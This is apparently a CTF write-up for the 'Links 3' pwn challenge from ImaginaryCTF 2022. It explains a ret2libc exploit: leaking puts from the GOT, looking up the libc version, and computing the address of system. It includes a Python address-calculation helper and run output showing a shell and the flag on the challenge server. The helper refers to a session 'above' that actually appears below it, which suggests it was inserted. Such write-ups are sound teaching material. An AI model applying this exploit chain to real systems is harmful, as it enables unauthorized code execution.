Links 3

Writeup for Links 3 (Pwn) - Imaginary CTF (2022) 💜

Video Walkthrough

Description

And now you guys are exploiting my View Time feature that I put there solely for your convenience? Fine, then - no more time for you!

download challenge binary

Solution

I'll keep this short; since Links 2, the view_time function has been removed. We no longer have system in the GOT, but that doesn't matter.

As is common practice with stack-based buffer overflows, we can leak the address of any Lib-C function and then subtract its known offset to calculate our way back to the base of the library. From there, we can add any offset we like to reach the function of our choosing, e.g. libc.system, or a string inside libc, e.g. "/bin/sh".

I chose to leak got.puts; when run against the server, it leaks 0x7fbfd373eed0. Once we have the address of a known function, we can take it to libc.blukat.me or libc.rip and provide the function name and address.

We'll get a list of possible Lib-C library versions. The more functions we leak, the more we can narrow down the search.

In this case, the correct version was libc6_2.35-0ubuntu3_amd64, so we plug in the correct offsets.

libc = puts - 0x80ed0
system = libc + 0x50d60
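The two lines above are the whole ret2libc calculation. As an added example (not the author's solve script), here it is as a small Python helper that unpacks the raw bytes puts prints for a GOT entry, derives the libc base with the libc6_2.35-0ubuntu3_amd64 offsets from the page, and checks that the result is page-aligned, which is the quickest way to notice that the wrong libc version (and therefore the wrong offsets) was picked from the lookup site. The sample leak bytes are constructed from the 0x7f470992eed0 value shown in the run output.

```python
import struct

# Offsets taken from the write-up for libc6_2.35-0ubuntu3_amd64.
PUTS_OFFSET = 0x80ED0
SYSTEM_OFFSET = 0x50D60


def parse_leak(raw: bytes) -> int:
    """Convert the bytes puts() printed for a GOT entry into an integer.

    puts stops at the first NUL byte, so a 64-bit user-space pointer
    normally arrives as 6 bytes; pad to 8 and unpack little-endian.
    """
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]


def resolve(leaked_puts: int) -> dict:
    """Derive the libc base and the system address from a leaked puts address.

    libc is mapped on a page boundary, so a base with low 12 bits set means
    the offset (i.e. the libc version) does not match the remote library.
    """
    base = leaked_puts - PUTS_OFFSET
    if base & 0xFFF:
        raise ValueError(
            f"libc base {base:#x} is not page-aligned: wrong libc version/offset"
        )
    return {"base": base, "system": base + SYSTEM_OFFSET}


if __name__ == "__main__":
    # Constructed sample: the raw form of the 0x7f470992eed0 leak from the page.
    sample_leak = b"\xd0\xee\x92\x09\x47\x7f"
    puts_addr = parse_leak(sample_leak)
    addrs = resolve(puts_addr)
    print(f"[*] leaked got_puts: {puts_addr:#x}")
    print(f"[*] libc base:       {addrs['base']:#x}")
    print(f"[*] got_system:      {addrs['system']:#x}")
```

Running it reproduces the 0x7f47098fed60 system address from the session above; feeding it an address that came from a different libc build trips the alignment check instead of silently producing a bogus pointer.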

Running the binary, we get a shell.

python exploit.py REMOTE puzzler7.imaginaryctf.org 2998
[+] Opening connection to puzzler7.imaginaryctf.org on port 2998: Done
[*] leaked got_puts: 0x7f470992eed0
[*] got_system: 0x7f47098fed60
[*] Switching to interactive mode
 What data do you want to write to this element?

>>> $ cat flag.txt
ictf{dammit_I'm_never_gonna_mix_up_64_and_0x64_again_it's_cost_me_three_flags_already}

note: If this write-up didn't make much sense, review the Links 1 and Links 2 write-ups first 🙂

Solve Script
